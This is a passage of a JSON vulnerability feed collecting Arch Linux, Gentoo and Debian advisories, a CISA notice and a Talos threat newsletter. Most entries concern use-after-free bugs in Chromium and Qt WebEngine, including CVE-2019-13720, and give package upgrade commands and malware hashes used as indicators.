arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1059\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.13.2-2 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 5.13.2-2.\n\n# pacman -Syu \"qt5-webengine>=5.13.2-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/64347\nhttps://code.qt.io/cgit/qt/qtwebengine-chromium.git/patch/?id=d6e5fc10e417efdf8665d9fba57c269f0534072f\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://security.archlinux.org/CVE-2019-13720", "modified": "2019-11-02T00:00:00", "published": "2019-11-02T00:00:00", "id": "ASA-201911-2", "href": "https://security.archlinux.org/ASA-201911-2", "type": "archlinux", "title": "[ASA-201911-2] qt5-webengine: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T18:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "Arch Linux Security Advisory ASA-201911-1\n=========================================\n\nSeverity: Critical\nDate : 2019-11-01\nCVE-ID : CVE-2019-13720 CVE-2019-13721\nPackage : chromium\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1058\n\nSummary\n=======\n\nThe package chromium before version 78.0.3904.87-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 78.0.3904.87-1.\n\n# pacman -Syu \"chromium>=78.0.3904.87-1\"\n\nThe problems have been fixed upstream in version 78.0.3904.87.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-13720 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\n- CVE-2019-13721 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the PDFium component\nof the chromium browser before 78.0.3904.87.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://crbug.com/1013868\nhttps://security.archlinux.org/CVE-2019-13720\nhttps://security.archlinux.org/CVE-2019-13721", "modified": "2019-11-01T00:00:00", "published": "2019-11-01T00:00:00", "id": "ASA-201911-1", "href": "https://security.archlinux.org/ASA-201911-1", "type": "archlinux", "title": "[ASA-201911-1] chromium: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:57", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720"], "description": "Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. One of these vulnerabilities (CVE-2019-13720) was detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Chrome Release](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome>); we'd welcome your feedback.\n", "modified": "2019-10-31T00:00:00", "published": "2019-10-31T00:00:00", "id": "CISA:809811C28F231C547A37018C8189C268", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome", "type": "cisa", "title": "Google Releases Security Updates for Chrome", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2019-11-14T15:37:55", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720"], "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nThe only news we\u2019re going to cover this week is the biggest news we\u2019ve had in a while. Tuesday, we announced that Cisco Incident Response was becoming part of the Talos family. We\u2019ve been working together for years, but now we\u2019ll be closer than ever, so Incident Response can benefit from Talos\u2019 intelligence, while their boots-on-the-ground experience will only add to Talos\u2019 portfolio. \n \nCheck out our [announcement blog post](<https://blog.talosintelligence.com/2019/11/talos-cisco-incident-response-team-up.html>) for more information. The Talos Incident Response [at-a-glance](<https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/084/678/original/IR-AAG-3.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20191107%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20191107T153609Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=dafed95cccffbd6448473bcbb91f3516731d2ad25499ebcaf24147d014cceb32>) also provides an overview of the services IR provides. And the new [IR page](<https://talosintelligence.com/incident_response>) on TalosIntelligence.com gives you an easy way to contact IR, should you need their services. \n \nWe also have a [special edition of the Beers with Talos podcast](<https://blog.talosintelligence.com/2019/11/beers-with-talos-ep-65-please-welcome.html>), where Amy Henderson of Talos\u2019 Threat Interdiction team joins us to talk about the benefits of this new relationship. \n \n\n\n### Upcoming public engagements with Talos\n\n**Event: **\u201cIt\u2019s Never DNS\u2026. It Was DNS: How Adversaries Are Abusing Network Blind Spots\u201d at [SecureWV/Hack3rCon X](<https://securewv.org/>) \n**Location: **Charleston Coliseum & Convention Center, Charleston, WV \n**Date: **Nov. 15 - 17 \n**Speakers: **Edmund Brumaghin and Earl Carter \n**Synopsis: **While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don\u2019t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more. \n \n**Event: **\u201cReading Telegram messages abusing the shadows\u201d at [BSides Lisbon](<https://bsideslisbon.org/schedule/>)** ** \n**Location: **Auditorio FMD-UL, Lisbon, Portugal \n**Date: **Nov. 28 - 29 \n**Speakers: **Vitor Ventura \n**Synopsis: **One of the cornerstones of privacy today is secure messaging applications like Telegram, which deploy end-to-end encryption to protect the communications. But several clone applications have been created and distributed with the intent of spying on their users. In this talk, Vitor will demonstrate how the Telegram registration process became abused, allowing message interception on non-rooted Android devices without replacing the official application. This is another example on how encryption is not a panacea, and that side-channel attacks like this are a real problem for otherwise secure applications. \n \n**Event: **\u201cSigned, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks\u201d at [CactusCon](<https://www.cactuscon.com/2019-talks-and-workshops/signed-sealed-compromised-the-past-present-and-future-of-supply-chain-attacks>) \n**Location: **Charleston Coliseum & Convention Center, Charleston, WV \n**Date:** Dec. 6 - 7 \n**Speakers: **Edmund Brumaghin and Earl Carter \n**Synopsis: **This talk will discuss the common techniques we\u2019re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future. \n\n\n### Cyber Security Week in Review\n\n * The [first public exploitation of the BlueKeep vulnerability](<https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/>) hit over the weekend. Security researchers noticed the attacks in honeypots installing cryptocurrency miners, far from the worst possible outcome from these kinds of attacks. \n * The U.S. and Taiwan [held cyber war exercises](<https://www.bbc.com/news/technology-50289974>) this week being touted as the first of their kind. Taiwanese officials say the two countries focused on attacks that could come from North Korean-linked adversaries and other nation-state actors. \n * The head of Russia\u2019s State Security Service recently said at a conference Russia and the U.S. have [resumed cooperation on cyber security](<https://www.thedailybeast.com/putins-top-spy-russian-fsb-chief-alexander-bortnikov-were-teaming-up-with-dc-on-cybersecurity>). Russia is maintaining contact between their security experts and the CIA, FBI and DEA in the U.S., he said. \n * Google is teaming up with [three private cyber security firms](<https://www.zdnet.com/article/google-asks-three-mobile-security-firms-to-help-scan-play-store-apps/>) to scan the Google Play store for malicious apps. Malware authors have been able to create ways to bypass the traditional protections Google put in place to stop malicious apps before they are posted on the store. \n * Two former Twitter employees were [charged with spying on behalf of Saudi Arabia](<https://www.cnn.com/2019/11/06/tech/twitter-employees-saudi-arabia-spying/index.html>). American prosecutors say the two men used their privileged access to gather information on Saudi political dissidents. \n * Voting machines in one Indiana country reportedly [switched users\u2019 votes](<https://thehill.com/homenews/state-watch/469137-machines-reportedly-switching-votes-plagues-indiana-county-for-second>), one of a few reports of malfunctioning machines on election day in the U.S. Several voters reported that the touchscreen machines would not select the candidate they wanted to choose, errors that are backed up with video evidence. \n * Apple [released updates](<https://www.forbes.com/sites/zakdoffman/2019/10/31/apple-patches-serious-ios-13-and-catalina-security-issues-update-your-devices-now/#34d873a52c2a>) for its Catalina operating system and iOS to patch several critical remote code execution vulnerabilities. The U.S. Department of Homeland Security urged users to update their devices as soon as possible. \n * Malware authors are starting to [unleash a wave of politically themed malware](<https://blog.talosintelligence.com/2019/11/political-malware.html>). Talos recently discovered malware families using the likenesses of U.S. Donald Trump and Russian leader Vladimir Putin in a series of ransomware, RATs and screenlockers. \n\n### Notable recent security issues\n\n**Title: **[Use-after-free bug in Chrome could allow complete system takeover](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) \n**Description: **Google Chrome is urging users to update their web browsers as soon as possible due to a critical use-after-free vulnerability. The company says it will be releasing updates this week to protect against exploitation of the bug. The vulnerability, identified as CVE-2019-13720, exists in Chrome\u2019s audio component, and could allow an attacker to execute arbitrary code or enable full remote code execution capabilities. \n**Snort SIDs: **52068, 52069 \n** \n****Title: **[Two remote code execution vulnerabilities in Investintech Able2Extract](<https://blog.talosintelligence.com/2019/11/vuln-spotlight-RCE-investintech-able2extract-nov-2019.html>) \n**Description: **Cisco Talos recently discovered two remote code execution vulnerabilities in Investintech\u2019s Able2Extract Professional. This software is a cross-platform PDF tool for Windows, Mac and Linux that converts PDFs and allows users to create and edit them. Other features include PDF signing, redactions and annotations. An attacker could exploit these vulnerabilities to execute arbitrary code on the victim machine. \n**Snort SIDs: **50864 - 50869 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510](<https://www.virustotal.com/gui/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details>) \n**MD5:** 4a50780ddb3db16ebab57b0ca42da0fb \n**Typical Filename:** xme64-2141.exe \n**Claimed Product: **N/A \n**Detection Name:** W32.7ACF71AFA8-95.SBX.TG \n \n**SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5:** 47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename:** qmreportupload \n**Claimed Product:** qmreportupload \n**Detection Name:** Win.Trojan.Generic::in10.talos \n \n**SHA 256:** [6b01db091507022acfd121cc5d1f6ff0db8103f46a1940a6779dc36cca090854](<https://www.virustotal.com/gui/file/6b01db091507022acfd121cc5d1f6ff0db8103f46a1940a6779dc36cca090854/details>) \n**MD5:** 74f4e22e5be90d152521125eaf4da635 \n**Typical Filename:** jsonMerge.exe \n**Claimed Product:** ITSPlatform \n**Detection Name: **W32.GenericKD:Attribute.22lk.1201 \n \n**SHA 256: **[46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08](<https://www.virustotal.com/gui/file/46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08/details>) \n**MD5:** db69eaaea4d49703f161c81e6fdd036f \n**Typical Filename: **xme32-2141-gcc.exe \n**Claimed Product:** N/A \n**Detection Name:** W32.46B241E3D3-95.SBX.TG \n \n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5:** 8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** Eternalblue-2.2.0.exe \n**Claimed Product:** N/A \n**Detection Name:** W32.WNCryLdrA:Trojan.22k2.1201\n\n", "modified": "2019-11-14T07:12:30", "published": "2019-11-14T07:12:30", "id": "TALOSBLOG:1789DE47001AAA9B14B2D2EC65C18C6A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/4n3ghJUQWvA/threat-source-newsletter-oct-31-2019.html", "type": "talosblog", "title": "Threat Source newsletter (Nov. 7, 2019)", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2020-04-02T00:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720"], "description": "### Background\n\nLibrary for rendering dynamic web content in Qt5 C++ and QML applications. \n\n### Description\n\nA use-after-free vulnerability has been found in the audio component of Qt WebEngine. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file in an application linked against Qt WebEngine, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Qt WebEngine users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-qt/qtwebengine-5.14.1\"", "edition": 1, "modified": "2020-04-01T00:00:00", "published": "2020-04-01T00:00:00", "id": "GLSA-202004-04", "href": "https://security.gentoo.org/glsa/202004-04", "title": "Qt WebEngine: Arbitrary code execution", "type": "gentoo", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-04-06T22:28:11", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21192", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21196", "CVE-2021-21195", "CVE-2021-21171", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21199", "CVE-2021-21172", "CVE-2021-21191", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21193", "CVE-2021-21166", "CVE-2021-21194", "CVE-2021-21175", "CVE-2021-21198", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169", "CVE-2021-21197"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4886-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nApril 06, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2021-21159 CVE-2021-21160 CVE-2021-21161 CVE-2021-21162\n CVE-2021-21163 CVE-2021-21165 CVE-2021-21166 CVE-2021-21167\n CVE-2021-21168 CVE-2021-21169 CVE-2021-21170 CVE-2021-21171\n CVE-2021-21172 CVE-2021-21173 CVE-2021-21174 CVE-2021-21175\n CVE-2021-21176 CVE-2021-21177 CVE-2021-21178 CVE-2021-21179\n CVE-2021-21180 CVE-2021-21181 CVE-2021-21182 CVE-2021-21183\n CVE-2021-21184 CVE-2021-21185 CVE-2021-21186 CVE-2021-21187\n CVE-2021-21188 CVE-2021-21189 CVE-2021-21190 CVE-2021-21191\n CVE-2021-21192 CVE-2021-21193 CVE-2021-21194 CVE-2021-21195\n CVE-2021-21196 CVE-2021-21197 CVE-2021-21198 CVE-2021-21199\n\nSeveral vulnerabilites have been discovered in the chromium web browser.\n\nCVE-2021-21159\n\n Khalil Zhani disocvered a buffer overflow issue in the tab implementation.\n\nCVE-2021-21160\n\n Marcin Noga discovered a buffer overflow issue in WebAudio.\n\nCVE-2021-21161\n\n Khalil Zhani disocvered a buffer overflow issue in the tab implementation.\n\nCVE-2021-21162\n\n A use-after-free issue was discovered in the WebRTC implementation.\n\nCVE-2021-21163\n\n Alison Huffman discovered a data validation issue.\n\nCVE-2021-21165\n\n Alison Huffman discovered an error in the audio implementation.\n\nCVE-2021-21166\n\n Alison Huffman discovered an error in the audio implementation.\n\nCVE-2021-21167\n\n Leecraso and Guang Gong discovered a use-after-free issue in the bookmarks\n implementation.\n\nCVE-2021-21168\n\n Luan Herrera discovered a policy enforcement error in the appcache.\n\nCVE-2021-21169\n\n Bohan Liu and Moon Liang discovered an out-of-bounds access issue in the\n v8 javascript library.\n\nCVE-2021-21170\n\n David Erceg discovered a user interface error.\n\nCVE-2021-21171\n\n Irvan Kurniawan discovered a user interface error.\n\nCVE-2021-21172\n\n Maciej Pulikowski discovered a policy enforcement error in the File\n System API.\n\nCVE-2021-21173\n\n Tom Van Goethem discovered a network based information leak.\n\nCVE-2021-21174\n\n Ashish Guatam Kambled discovered an implementation error in the Referrer\n policy.\n\nCVE-2021-21175\n\n Jun Kokatsu discovered an implementation error in the Site Isolation\n feature.\n\nCVE-2021-21176\n\n Luan Herrera discovered an implementation error in the full screen mode.\n\nCVE-2021-21177\n\n Abdulrahman Alqabandi discovered a policy enforcement error in the\n Autofill feature.\n\nCVE-2021-21178\n\n Japong discovered an error in the Compositor implementation.\n\nCVE-2021-21179\n\n A use-after-free issue was discovered in the networking implementation.\n\nCVE-2021-21180\n\n Abdulrahman Alqabandi discovered a use-after-free issue in the tab search\n feature.\n\nCVE-2021-21181\n\n Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a side-channel\n information leak in the Autofill feature.\n\nCVE-2021-21182\n\n Luan Herrera discovered a policy enforcement error in the site navigation\n implementation.\n\nCVE-2021-21183\n\n Takashi Yoneuchi discovered an implementation error in the Performance API.\n\nCVE-2021-21184\n\n James Hartig discovered an implementation error in the Performance API.\n\nCVE-2021-21185\n\n David Erceg discovered a policy enforcement error in Extensions.\n\nCVE-2021-21186\n\n dhirajkumarnifty discovered a policy enforcement error in the QR scan\n implementation.\n\nCVE-2021-21187\n\n Kirtikumar Anandrao Ramchandani discovered a data validation error in\n URL formatting.\n\nCVE-2021-21188\n\n Woojin Oh discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2021-21189\n\n Khalil Zhani discovered a policy enforcement error in the Payments\n implementation.\n\nCVE-2021-21190\n\n Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\nCVE-2021-21191\n\n raven discovered a use-after-free issue in the WebRTC implementation.\n\nCVE-2021-21192\n\n Abdulrahman Alqabandi discovered a buffer overflow issue in the tab\n implementation.\n\nCVE-2021-21193\n\n A use-after-free issue was discovered in Blink/Webkit.\n\nCVE-2021-21194\n\n Leecraso and Guang Gong discovered a use-after-free issue in the screen\n capture feature.\n\nCVE-2021-21195\n\n Liu and Liang discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2021-21196\n\n Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\nCVE-2021-21197\n\n Abdulrahman Alqabandi discovered a buffer overflow issue in the tab\n implementation.\n\nCVE-2021-21198\n\n Mark Brand discovered an out-of-bounds read issue in the Inter-Process\n Communication implementation.\n\nCVE-2021-21199\n\n Weipeng Jiang discovered a use-after-free issue in the Aura window and\n event manager.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 89.0.4389.114-1~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-04-06T13:39:19", "published": "2021-04-06T13:39:19", "id": "DEBIAN:DSA-4886-1:0EF07", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00067.html", "title": "[SECURITY] [DSA 4886-1] chromium security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-11T01:27:58", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13704", "CVE-2019-5871", "CVE-2019-13714", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13687", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5869", "CVE-2019-13686", "CVE-2019-5880", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13699", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-13719", "CVE-2019-13665", "CVE-2019-13691", "CVE-2019-13674", "CVE-2019-13706", "CVE-2019-5875", "CVE-2019-13678", "CVE-2019-13694", "CVE-2019-13718", "CVE-2019-13701", "CVE-2019-13679", "CVE-2019-13702", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-13713", "CVE-2019-13700", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13707", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-13685", "CVE-2019-13695", "CVE-2019-5870", "CVE-2019-13717", "CVE-2019-13660", "CVE-2019-5878", "CVE-2019-13709", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5879", "CVE-2019-13696", "CVE-2019-13703", "CVE-2019-13693", "CVE-2019-13692", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-13715", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-13697", "CVE-2019-13708", "CVE-2019-13705", "CVE-2019-13675", "CVE-2019-13710", "CVE-2019-5874", "CVE-2019-13667", "CVE-2019-13688", "CVE-2019-13711", "CVE-2019-13716"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-4562-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nNovember 10, 2019 https://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2019-5869 CVE-2019-5870 CVE-2019-5871 CVE-2019-5872\n CVE-2019-5874 CVE-2019-5875 CVE-2019-5876 CVE-2019-5877\n CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-13659\n CVE-2019-13660 CVE-2019-13661 CVE-2019-13662 CVE-2019-13663\n CVE-2019-13664 CVE-2019-13665 CVE-2019-13666 CVE-2019-13667\n CVE-2019-13668 CVE-2019-13669 CVE-2019-13670 CVE-2019-13671\n CVE-2019-13673 CVE-2019-13674 CVE-2019-13675 CVE-2019-13676\n CVE-2019-13677 CVE-2019-13678 CVE-2019-13679 CVE-2019-13680\n CVE-2019-13681 CVE-2019-13682 CVE-2019-13683 CVE-2019-13685\n CVE-2019-13686 CVE-2019-13687 CVE-2019-13688 CVE-2019-13691\n CVE-2019-13692 CVE-2019-13693 CVE-2019-13694 CVE-2019-13695\n CVE-2019-13696 CVE-2019-13697 CVE-2019-13699 CVE-2019-13700\n CVE-2019-13701 CVE-2019-13702 CVE-2019-13703 CVE-2019-13704\n CVE-2019-13705 CVE-2019-13706 CVE-2019-13707 CVE-2019-13708\n CVE-2019-13709 CVE-2019-13710 CVE-2019-13711 CVE-2019-13713\n CVE-2019-13714 CVE-2019-13715 CVE-2019-13716 CVE-2019-13717\n CVE-2019-13718 CVE-2019-13719 CVE-2019-13720 CVE-2019-13721\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2019-5869\n\n Zhe Jin discovered a use-after-free issue.\n\nCVE-2019-5870\n\n Guang Gong discovered a use-after-free issue.\n\nCVE-2019-5871\n\n A buffer overflow issue was discovered in the skia library.\n\nCVE-2019-5872\n\n Zhe Jin discovered a use-after-free issue.\n\nCVE-2019-5874\n\n James Lee discovered an issue with external Uniform Resource Identifiers.\n\nCVE-2019-5875\n\n Khalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-5876\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-5877\n\n Guang Gong discovered an out-of-bounds read issue.\n\nCVE-2019-5878\n\n Guang Gong discovered an use-after-free issue in the v8 javascript\n library.\n\nCVE-2019-5879\n\n Jinseo Kim discover that extensions could read files on the local\n system.\n\nCVE-2019-5880\n\n Jun Kokatsu discovered a way to bypass the SameSite cookie feature.\n\nCVE-2019-13659\n\n Lnyas Zhang discovered a URL spoofing issue.\n\nCVE-2019-13660\n\n Wenxu Wu discovered a user interface error in full screen mode.\n\nCVE-2019-13661\n\n Wenxu Wu discovered a user interface spoofing issue in full screen mode.\n\nCVE-2019-13662\n\n David Erceg discovered a way to bypass the Content Security Policy.\n\nCVE-2019-13663\n\n Lnyas Zhang discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13664\n\n Thomas Shadwell discovered a way to bypass the SameSite cookie feature.\n\nCVE-2019-13665\n\n Jun Kokatsu discovered a way to bypass the multiple file download\n protection feature.\n\nCVE-2019-13666\n\n Tom Van Goethem discovered an information leak.\n\nCVE-2019-13667\n\n Khalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-13668\n\n David Erceg discovered an information leak.\n\nCVE-2019-13669\n\n Khalil Zhani discovered an authentication spoofing issue.\n\nCVE-2019-13670\n\n Guang Gong discovered a memory corruption issue in the v8 javascript\n library.\n\nCVE-2019-13671\n\n xisigr discovered a user interface error.\n\nCVE-2019-13673\n\n David Erceg discovered an information leak.\n\nCVE-2019-13674\n\n Khalil Zhani discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13675\n\n Jun Kokatsu discovered a way to disable extensions.\n\nCVE-2019-13676\n\n Wenxu Wu discovered an error in a certificate warning.\n\nCVE-2019-13677\n\n Jun Kokatsu discovered an error in the chrome web store.\n\nCVE-2019-13678\n\n Ronni Skansing discovered a spoofing issue in the download dialog window.\n\nCVE-2019-13679\n\n Conrad Irwin discovered that user activation was not required for\n printing.\n\nCVE-2019-13680\n\n Thijs Alkamade discovered an IP address spoofing issue.\n\nCVE-2019-13681\n\n David Erceg discovered a way to bypass download restrictions.\n\nCVE-2019-13682\n\n Jun Kokatsu discovered a way to bypass the site isolation feature.\n\nCVE-2019-13683\n\n David Erceg discovered an information leak.\n\nCVE-2019-13685\n\n Khalil Zhani discovered a use-after-free issue.\n\nCVE-2019-13686\n\n Brendon discovered a use-after-free issue.\n\nCVE-2019-13687\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-13688\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-13691\n\n David Erceg discovered a user interface spoofing issue.\n\nCVE-2019-13692\n\n Jun Kokatsu discovered a way to bypass the Same Origin Policy.\n\nCVE-2019-13693\n\n Guang Gong discovered a use-after-free issue.\n\nCVE-2019-13694\n\n banananapenguin discovered a use-after-free issue.\n\nCVE-2019-13695\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-13696\n\n Guang Gong discovered a use-after-free issue in the v8 javascript library.\n\nCVE-2019-13697\n\n Luan Herrera discovered an information leak.\n\nCVE-2019-13699\n\n Man Yue Mo discovered a use-after-free issue.\n\nCVE-2019-13700\n\n Man Yue Mo discovered a buffer overflow issue.\n\nCVE-2019-13701\n\n David Erceg discovered a URL spoofing issue.\n\nCVE-2019-13702\n\n Phillip Langlois and Edward Torkington discovered a privilege escalation\n issue in the installer.\n\nCVE-2019-13703\n\n Khalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-13704\n\n Jun Kokatsu discovered a way to bypass the Content Security Policy.\n\nCVE-2019-13705\n\n Luan Herrera discovered a way to bypass extension permissions.\n\nCVE-2019-13706\n\n pdknsk discovered an out-of-bounds read issue in the pdfium library.\n\nCVE-2019-13707\n\n Andrea Palazzo discovered an information leak.\n\nCVE-2019-13708\n\n Khalil Zhani discovered an authentication spoofing issue.\n\nCVE-2019-13709\n\n Zhong Zhaochen discovered a way to bypass download restrictions.\n\nCVE-2019-13710\n\n bernardo.mrod discovered a way to bypass download restrictions.\n\nCVE-2019-13711\n\n David Erceg discovered an information leak.\n\nCVE-2019-13713\n\n David Erceg discovered an information leak.\n\nCVE-2019-13714\n\n Jun Kokatsu discovered an issue with Cascading Style Sheets.\n\nCVE-2019-13715\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2019-13716\n\n Barron Hagerman discovered an error in the service worker implementation.\n\nCVE-2019-13717\n\n xisigr discovered a user interface spoofing issue.\n\nCVE-2019-13718\n\n Khalil Zhani discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13719\n\n Khalil Zhani discovered a user interface spoofing issue.\n\nCVE-2019-13720\n\n Anton Ivanov and Alexey Kulaev discovered a use-after-free issue.\n\nCVE-2019-13721\n\n banananapenguin discovered a use-after-free issue in the pdfium library.\n\nFor the oldstable distribution (stretch), support for chromium has been\ndiscontinued. Please upgrade to the stable release (buster) to continue\nreceiving chromium updates or switch to firefox, which continues to be\nsupported in the oldstable release.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 